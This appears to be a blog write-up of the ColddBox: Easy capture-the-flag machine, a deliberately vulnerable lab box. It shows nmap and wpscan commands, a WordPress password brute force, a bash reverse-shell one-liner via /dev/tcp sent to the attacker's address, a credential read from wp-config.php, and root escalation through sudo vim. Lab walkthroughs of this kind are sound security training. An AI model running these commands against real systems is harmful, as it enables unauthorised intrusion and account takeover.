ColddBox: Easy (VulnHub)

Publicat de pe

ColddBox: Easy is a vulnerable machine from TryHackMe that is rated as an easy box.

As usual we are going to start by scanning the box for open ports using nmap. 

Note: First you need to scan for all ports to find the ssh port then you can use the command below.

Command: nmap -p 80,4512 -sC -sV $IP 

On this machine are two open ports:

  • port 80 HTTP
  • port 4512 SSH
Visiting the website we can se a welcome text from the room creator, C0ldd.
Because we already know that this is a wordpress box, I didn't started a gobuster scan, instead I used wpscan to enumerate users.
Command: wpscan --url http://$IP/ --enumerate u
We discovered 4 users. We can user wpscan to brute force the passwords as well. 

I've chosen to brute force the password for user c0ldd because that was the name of the creator, so I said I'll give it a try. Luckly I was right:
Command: wpscan --url http://$IP/ --usernames c0ldd --passwords /path/to/wordlist/
Now we can access the wordpress as user c0ldd, and luckly this user has administrator privileges.
There are many ways on exploiting wordpress in order to get a reverse shell on the box, but I chose to upload a plugin named WPTerm which you can download it from here: https://wordpress.org/plugins/wpterm/. WPTerm is an xterm-like plugin. It can be used to run non- interactive shell commands from the wordpress  admin dashboard.
After instalation, activate the plugin and used the command below. 
Command used to get a reverse shell: bash -c 'bash -i >& /dev/tcp/$YOUR IP/$YOUR PORT 0>&1'

Shell as www-data
Now if we check wp-config.php which you can find it in /var/www/html/ you can find the password for used c0ldd.
Use the password cybersecurity to get a shell as user c0ldd (I recommend to login using ssh to have a stable shell).
If we check the user privileges for used c0ldd, by using the sudo -l command, we can see that we can execute 3 commands as root.
  • /usr/bin/vim
  • /bin/chmod
  • /usr/bin/ftp
I wanted to use vim to get a root shell.
Command: sudo -u root /usr/bin/vim
After that inside vim press : (colon) and type the command below:
Command: !/bin/bash
After you get a root shell you can find both user and root flag!

Comments

Post a Comment